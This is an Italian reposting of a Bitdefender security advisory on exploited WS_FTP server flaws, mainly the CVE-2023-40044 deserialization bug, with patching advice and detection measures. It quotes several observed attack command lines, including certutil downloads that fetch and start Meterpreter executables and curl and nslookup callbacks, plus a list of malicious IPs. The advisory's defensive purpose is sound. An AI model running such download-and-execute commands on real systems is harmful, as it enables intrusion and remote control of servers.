MPG HUB è un Progetto MPG System
ISCRIVITI
  • Cyber Security
    Prendere il volo: le minacce informatiche nascoste delle compagnie aeree

    Prendere il volo: le minacce informatiche nascoste delle compagnie aeree

    Come le violazioni dei dati sanitari nel 2024 influenzeranno il panorama delle minacce per le applicazioni nel 2025

    Come le violazioni dei dati sanitari nel 2024 influenzeranno il panorama delle minacce per le applicazioni nel 2025

    Monitoraggio dark web per VIP user: mantieni il controllo dei dati

    Monitoraggio dark web per VIP user: mantieni il controllo dei dati

    Protezione delle applicazioni e conformità DORA: cosa devi sapere

    Protezione delle applicazioni e conformità DORA: cosa devi sapere

    Comprendere i ruoli nell’ecosistema Ransomware-as-a-Service: chi sta prendendo di mira le lacune della sicurezza dei dati

    Comprendere i ruoli nell’ecosistema Ransomware-as-a-Service: chi sta prendendo di mira le lacune della sicurezza dei dati

    Le differenze tra DORA e NIS 2

    Le differenze tra DORA e NIS 2

    Annunci dannosi nascosti nei risultati di ricerca

    Annunci dannosi nascosti nei risultati di ricerca

    Come recuperare i file cancellati: la guida definitiva per Windows e Mac

    Come recuperare i file cancellati: la guida definitiva per Windows e Mac

    Uno sguardo completo all’evoluzione del cybercrimine underground

    Uno sguardo completo all’evoluzione del cybercrimine underground

  • Case Studies
    La Sicurezza ICT in Italia nel 2022: I dati del Clusit

    La Sicurezza ICT in Italia nel 2022: I dati del Clusit

    Come accedere al 70% delle reti Wi-Fi di un quartiere residenziale

    Come accedere al 70% delle reti Wi-Fi di un quartiere residenziale

    Perché Windows 11 è più sicuro di Windows 10

    Perché Windows 11 è più sicuro di Windows 10

    Cyber security nel retail: l’approccio più efficace – Case study

    Cyber security nel retail: l’approccio più efficace – Case study

    Storia di successo – Bethesda

    Storia di successo – Bethesda

    5 ragioni per cui le società finanziare hanno difficoltà a proteggere i dati

    5 ragioni per cui le società finanziare hanno difficoltà a proteggere i dati

    Case study Syneto – Variati

    Case study Syneto – Variati

    Case study Syneto – Comitel

    Case study Syneto – Comitel

    Case study Syneto – Ocrew

    Case study Syneto – Ocrew

    Case study Syneto – OMC2

    Case study Syneto – OMC2

    Case study Watchguard – Falköping

    Case study Watchguard – Falköping

    Case study Watchguard – Sacred Heart

    Case study Watchguard – Sacred Heart

    Case study Watchguard – Cibes

    Case study Watchguard – Cibes

    Case study Watchguard -Nicholas Mee

    Case study Watchguard -Nicholas Mee

    Case study Watchguard – ClarkeModet

    Case study Watchguard – ClarkeModet

    Case story Watchguard – UR&PENN

    Case story Watchguard – UR&PENN

    Case study Watchguard – Café Zupas

    Case study Watchguard – Café Zupas

    Case study Watchguard – Elfo

    Case study Watchguard – Elfo

    Case study Syneto – Jermann

    Case study Syneto – Jermann

  • Webinar
  • Video
  • About Us
    • Progetto
    • Contatti
Nessun risultato
Vedi tutti i risultati
  • Cyber Security
    Prendere il volo: le minacce informatiche nascoste delle compagnie aeree

    Prendere il volo: le minacce informatiche nascoste delle compagnie aeree

    Come le violazioni dei dati sanitari nel 2024 influenzeranno il panorama delle minacce per le applicazioni nel 2025

    Come le violazioni dei dati sanitari nel 2024 influenzeranno il panorama delle minacce per le applicazioni nel 2025

    Monitoraggio dark web per VIP user: mantieni il controllo dei dati

    Monitoraggio dark web per VIP user: mantieni il controllo dei dati

    Protezione delle applicazioni e conformità DORA: cosa devi sapere

    Protezione delle applicazioni e conformità DORA: cosa devi sapere

    Comprendere i ruoli nell’ecosistema Ransomware-as-a-Service: chi sta prendendo di mira le lacune della sicurezza dei dati

    Comprendere i ruoli nell’ecosistema Ransomware-as-a-Service: chi sta prendendo di mira le lacune della sicurezza dei dati

    Le differenze tra DORA e NIS 2

    Le differenze tra DORA e NIS 2

    Annunci dannosi nascosti nei risultati di ricerca

    Annunci dannosi nascosti nei risultati di ricerca

    Come recuperare i file cancellati: la guida definitiva per Windows e Mac

    Come recuperare i file cancellati: la guida definitiva per Windows e Mac

    Uno sguardo completo all’evoluzione del cybercrimine underground

    Uno sguardo completo all’evoluzione del cybercrimine underground

  • Case Studies
    La Sicurezza ICT in Italia nel 2022: I dati del Clusit

    La Sicurezza ICT in Italia nel 2022: I dati del Clusit

    Come accedere al 70% delle reti Wi-Fi di un quartiere residenziale

    Come accedere al 70% delle reti Wi-Fi di un quartiere residenziale

    Perché Windows 11 è più sicuro di Windows 10

    Perché Windows 11 è più sicuro di Windows 10

    Cyber security nel retail: l’approccio più efficace – Case study

    Cyber security nel retail: l’approccio più efficace – Case study

    Storia di successo – Bethesda

    Storia di successo – Bethesda

    5 ragioni per cui le società finanziare hanno difficoltà a proteggere i dati

    5 ragioni per cui le società finanziare hanno difficoltà a proteggere i dati

    Case study Syneto – Variati

    Case study Syneto – Variati

    Case study Syneto – Comitel

    Case study Syneto – Comitel

    Case study Syneto – Ocrew

    Case study Syneto – Ocrew

    Case study Syneto – OMC2

    Case study Syneto – OMC2

    Case study Watchguard – Falköping

    Case study Watchguard – Falköping

    Case study Watchguard – Sacred Heart

    Case study Watchguard – Sacred Heart

    Case study Watchguard – Cibes

    Case study Watchguard – Cibes

    Case study Watchguard -Nicholas Mee

    Case study Watchguard -Nicholas Mee

    Case study Watchguard – ClarkeModet

    Case study Watchguard – ClarkeModet

    Case story Watchguard – UR&PENN

    Case story Watchguard – UR&PENN

    Case study Watchguard – Café Zupas

    Case study Watchguard – Café Zupas

    Case study Watchguard – Elfo

    Case study Watchguard – Elfo

    Case study Syneto – Jermann

    Case study Syneto – Jermann

  • Webinar
  • Video
  • About Us
    • Progetto
    • Contatti
ISCRIVITI
Nessun risultato
Vedi tutti i risultati
Nessun risultato
Vedi tutti i risultati
Home Cyber Security

Avviso tecnico: vulnerabilità critiche in WS_FTP sfruttate in natura

Bitdefender da Bitdefender
6 Ottobre 2023
in Cyber Security
Tempo di lettura: 7 mins read
A A
Avviso tecnico: vulnerabilità critiche in WS_FTP sfruttate in natura

An illustration of the dangers of computer viruses and malware

Condividi con LinkedinCondividi con FacebookCondividi con TwitterCondividi con WhatsappCondividi con TelegramCondividi con Email

Il 27 settembre 2023, Progress Software Corporation, un fornitore di software, ha emesso un avviso di sicurezza riguardante otto vulnerabilità recentemente identificate che influiscono sul software WS_FTP. Queste vulnerabilità interessano tutte le versioni del server WS_FTP. Tra le vulnerabilità scoperte, due sono state classificate come CRITICA, tre come ALTA e tre come MEDIA in termini di gravità. Secondo le informazioni di Progress, l’aggiornamento a una versione con patch (versione 8.8.2), utilizzando il programma di installazione completo, è l’unico modo per risolvere questo problema.

CVE-2023-40044 – CVSS 10 (CRITICO)

CVE-2023-42657 – CVSS 9.9 (CRITICO)

CVE-2023-40045 – CVSS 8.3 (ALTO)

CVE-2023-40046 – CVSS 8.2 (ALTO)

CVE-2023-40047 – CVSS 8.3 (ALTO)

CVE-2023-40048 – CVSS 6.8 (MEDIO)

CVE-2022-27665 – CVSS 6.1 (MEDIO)

CVE-2023-40049 – CVSS 5.3 (MEDIO)

Anche se abbiamo notato un calo consistente nel numero di server vulnerabili, è importante sottolineare che ce ne sono ancora più di 2.000, ciascuno dei quali rappresenta potenzialmente un’intera rete. In particolare, la maggior parte di questi server si trova negli Stati Uniti.

Posizioni dei server WS_FTP in esecuzione secondo Shodan

La vulnerabilità critica CVE-2023-40044 ha suscitato il massimo interesse da parte del settore della sicurezza informatica e, sfortunatamente, anche l’interesse da parte di autori di minacce dannose. Pubblichiamo questo avviso tecnico per documentare i molteplici tentativi di sfruttamento rilevati dai nostri esperti di sicurezza negli ultimi giorni.

Descrizione della vulnerabilità
CVE-2023-40044 è una vulnerabilità legata all’esecuzione di codice in modalità remota pre-autenticazione nel modulo Ad Hoc Transfer che sfrutta una deserializzazione di oggetti .NET non sicura.

In .NET e in molti altri linguaggi di programmazione, la deserializzazione è il processo di riconversione dei dati serializzati (spesso sotto forma di file binari o testo) in oggetti o strutture dati che possono essere utilizzati da un programma. Questo processo è essenziale per le applicazioni che necessitano di trasmettere o archiviare dati in un formato strutturato, come l’invio di oggetti su una rete o il salvataggio in un file.

Una vulnerabilità di deserializzazione si verifica quando un programma deserializza i dati senza un’adeguata convalida, sanificazione o controlli di sicurezza. In altre parole, l’applicazione considera attendibili i dati serializzati in entrata senza verificarne l’integrità o l’autenticità. Un utente malintenzionato può creare dati serializzati dannosi che, una volta deserializzati dall’applicazione vulnerabile, eseguono codice arbitrario sul sistema con gli stessi privilegi dell’applicazione stessa. Strumenti come ysoserial.net possono essere utilizzati per racchiudere un comando specificato dall’utente in una stringa appositamente predisposta. Quando questa stringa viene deserializzata, attiva l’esecuzione del comando specificato.

In definitiva, tutto ciò che serve per eseguire il proprio codice su un server remoto è inviare una singola richiesta HTTP a un servizio vulnerabile.

Il modulo vulnerabile è MyFileUpload.UploadModule, situato nel file di libreria FileUploadLibrary.dll. Durante la nostra analisi, l’abbiamo identificata come una libreria di caricamento file di terze parti proveniente da darrenjohnstone.net, con un avviso di copyright che recita “Copyright © Darren Johnstone 2008“. È possibile che anche altri software che utilizzano questa libreria siano soggetti alla stessa vulnerabilità.

Per informazioni più tecniche su questa vulnerabilità, incluso un codice di prova, consigliamo l’analisi tecnica del team Assetnote che ha originariamente scoperto la vulnerabilità.

Appunti presi sul campo
La prima categoria di rilevamenti può essere attribuita a vari scanner di vulnerabilità, tra cui Burp Suite (.oastify.com), AcuMonitor (.bxss.me) o al semplice callback utilizzando curl (uno strumento versatile da riga di comando e una libreria per creare reti di rete richieste a vari protocolli e servizi).

“C:\Windows\System32\cmd.exe” /c cmd.exe /c powershell -command “curl hxxp://:25565”

“C:\Windows\System32\cmd.exe” /c “nslookup “

È difficile distinguere se le scansioni di vulnerabilità provengono da amministratori ben intenzionati che cercano di identificare e proteggere i sistemi vulnerabili o da autori di minacce dannose che tentano di individuare potenziali vittime, ma possiamo solo sperare nel primo scenario.

La seconda categoria di tentativi riguarda le azioni degli autori delle minacce che tentano attivamente di implementare webshell su questi server vulnerabili. Una webshell è uno script o un pezzo di codice dannoso che gli aggressori inseriscono su un server compromesso per ottenere accesso e controllo non autorizzati. Sebbene non sia possibile attribuire con precisione questi tentativi, questi possono essere broker di accesso iniziale, affiliati di ransomware o persino autori di minacce sponsorizzati dallo stato che stanno cercando di compromettere questi sistemi prima che vengano applicate le patch.

Tutti questi tentativi generano cmd.exe nel processo principale w3wp.exe (lavoratore IIS).

Nello scenario di attacco più comune, cmd.exe inizia a vivere dell’eseguibile certutil.exe per scaricare ed eseguire un eseguibile Meterpreter autonomo, rilevato da Bitdefender come “Trojan.Metasploit.A“. CertUtil, un programma nativo di Windows per la gestione dei certificati, include una funzionalità che consente agli utenti di scaricare file da URL remoti e salvarli localmente. Gli autori delle minacce utilizzano spesso questo LOLbin per scaricare e distribuire malware sui sistemi Windows, sfruttandone la legittimità per aggirare le misure di sicurezza e potenzialmente compromettere le macchine target.

“C:\Windows\System32\cmd.exe” /c certutil -urlcache -f http://:8080/_R8pCPgPKh2ksKU_tUusKQ %TEMP%\HwWuatOoqcCW.exe & start /B %TEMP%\HwWuatOoqcCW.exe

“C:\Windows\System32\cmd.exe” /c certutil -urlcache -f http://:8080/bi6srbBUYpj4HBiL0Lydwg %TEMP%\qkvwBDoJo.exe & start /B %TEMP%\qkvwBDoJo.exe

“C:\Windows\System32\cmd.exe” /c certutil -urlcache -f http://:8080/JFpNM6nSkTJ6rt33SaKexQ %TEMP%\OJHwmCCcNar.exe & start /B %TEMP%\OJHwmCCcNar.exe

Abbiamo analizzato anche gli attacchi in cui cmd.exe avvia una catena di comandi PowerShell. Questo attacco tenta di eludere il rilevamento utilizzando un bypass AMSI, utilizza una combinazione di tecniche di offuscamento del codice ed esegue uno shellcode codificato. Questo shellcode si connette al server di comando e controllo utilizzando la porta 49960. Questo shellcode viene rilevato da Bitdefender come Generic:ShellCode.Marte.4.98108467.

Conclusione e raccomandazioni
Da quando il ransomware Cl0p ha attaccato MOVEit Transfer (sempre di Progress Software) all’inizio di quest’anno, le soluzioni di trasferimento sicuro dei file rimangono un obiettivo popolare per i ricercatori di sicurezza e vari autori di minacce. Come delineato nell’avviso sulla sicurezza di Progress Software, l’aggiornamento a una versione con patch è il modo consigliato per risolvere questo problema.

La vulnerabilità nel server WS_FTP ricorda chiaramente l’importanza di mantenere i sistemi aggiornati con le ultime patch di sicurezza impiegando al tempo stesso una forte difesa perimetrale. Ciò che stiamo vedendo è che gli autori delle minacce intensificano i loro attacchi agli exploit delle vulnerabilità. Nel report Bitdefender 2023 Cybersecurity Assessment, gli intervistati di tutto il mondo hanno elencato per la prima volta le vulnerabilità del software e gli attacchi zero-day come la principale preoccupazione per la sicurezza informatica, superando gli attacchi di phishing e di ingegneria sociale. Questo riconoscimento è un buon segno, poiché abbiamo osservato che gli autori delle minacce prendono sempre più di mira le vulnerabilità del software. Dare priorità alle soluzioni per la gestione delle patch e la gestione dei rischi.

Durante i recenti attacchi, abbiamo osservato un elenco di indirizzi IP dannosi. Queste stesse fonti sono state segnalate anche da altri ricercatori e fornitori di sicurezza.

176.105.255[.]46

103.163.187[.]12

34.77.65[.]112

Infine, è fondamentale che le aziende di tutte le dimensioni stabiliscano solide capacità di rilevamento e risposta per identificare tempestivamente eventuali attività insolite sulle proprie reti e ridurre il tempo che gli avversari trascorrono all’interno dei loro sistemi. Gli autori delle minacce sono opportunisti; si sforzano di infiltrarsi in numerosi sistemi e spesso tornano più tardi per valutare i loro obiettivi. Utilizza il periodo che intercorre tra la violazione iniziale e qualsiasi potenziale estorsione, come un attacco ransomware, per rilevare e rispondere attivamente agli incidenti di sicurezza.

Per i clienti del servizio MDR di Bitdefender, il team sta monitorando attivamente eventuali segni di webshell o potenziali vulnerabilità all’interno dei servizi web. Questi controlli includono:

Monitoraggio dei processi e dei percorsi dei file comunemente collegati ai servizi Web, come “w3wp.exe”
Identificazione dei processi secondari relativi ai servizi web
Rilevamento di file che potrebbero essere indicativi di webshell, come quelli con estensioni come “aspx“
Ricerca di rilevamenti che includono il termine “webshell” nei nomi
Questi controlli generano ticket che vengono gestiti con priorità più alta. Il nostro obiettivo è garantire un monitoraggio e una protezione completi contro potenziali minacce alla sicurezza legate al web, affrontandole tempestivamente ed efficacemente.

Fonte: https://www.bitdefender.com/blog/businessinsights/technical-advisory-critical-vulnerabilities-in-wsftp-exploited-in-the-wild/

Tags: BitdefenderCyber Securityvulnerability

Ricevi le notifiche per non perderti nessun aggiornamento da MPG HUB

Disattiva Notifiche
Articolo Precedente

Come funziona il furto d’identità digitale nel workplace ibrido

Articolo Successivo

Cybersecurity: un attore chiave per il presente e il futuro del business

Bitdefender

Bitdefender

Articolo Successivo
Cybersecurity: un attore chiave per il presente e il futuro del business

Cybersecurity: un attore chiave per il presente e il futuro del business

Che cos’è l’autenticazione sicura del cliente (SCA), in che modo è diversa dalla 2FA e come funziona?

Che cos'è l'autenticazione sicura del cliente (SCA), in che modo è diversa dalla 2FA e come funziona?

Proteggi il tuo ambiente dagli attacchi Flood UDP

Proteggi il tuo ambiente dagli attacchi Flood UDP

NOTIFICHE

Ricevi le notifiche per non perdere nessun aggiornamento da MPG hub

Attiva Notifiche

Area Manager Cloud & Security

Antonello Subioli

TAG

Bitdefender Case Studies Cloud CTI Cyberoo Cyber Security Digital transformation EDR Endpoint Ermes Eset Gartner IDC MarketScape Incident Response Plan Intelligenza Artificiale Malware MDR Minacce digitali MSP No War Ospitality Password PayPal Phishing PII PMI Radware Ransomware Risk assessment SaaS Safetica Security as a Service Smart working Social network Stormshield Syneto Tag Distribuzione Trustbuilder USB VPN Watchguard Wi-Fi Windows XDR Zero Trust
MPG HUB

MPG HUB
È un progetto MPG SYSTEM SRL
Sviluppato in collaborazione con alcuni tra i principali brand di Cloud & Security.

Seguici su

Articoli Recenti

Ultimo Video

Pew pew pew! 💥
No, it’s not sci-fi — it’s cyber.
In the latest Unlocked 403, Robert Lipovsky and Alžbeta Kovaľová unpack the world of “pew pew maps” — those flashy global threat visualizations.
Cool? Definitely.
Meaningful? Sometimes.
Necessary? Let’s talk.
🎙️🎧 Listen and watch now to the full episode on our YouTube channel, Spotify, and Apple Podcasts. 

http://bit.ly/4kqdD8L
https://spoti.fi/458PdvQ
https://apple.co/3Zi92wW

#ESET #Cybersecurity #Podcast #Unlocked403
YouTube Video VVVrTjdJUFgtZFZFc0Fkam9MZEZkYTFnLkFoRmN1TVA3TWNV

Unlocked 403 - What are pew pew maps?

Navigazione

  • Cyber Security
  • Case Studies
  • Webinar
  • Video
  • Progetto
  • Contatti
  • Privacy Policy
  • Cookie Policy

© 2021 MPG HUB È un progetto MPG SYSTEM SRL / Devised by CONQUISTA© of Strategie Digitali.

Nessun risultato
Vedi tutti i risultati
  • Cyber Security
  • Case Studies
  • Webinar
  • Video
  • Progetto
  • Contatti

© 2021 MPG HUB È un progetto MPG SYSTEM SRL / Devised by CONQUISTA© of Strategie Digitali.

RESTA SEMPRE AGGIORNATO

Ricevi contenuti di valore
e inviti a webinar esclusivi.
Tutto sul tema Cyber Security & Cloud.
Zero Spam, è una promessa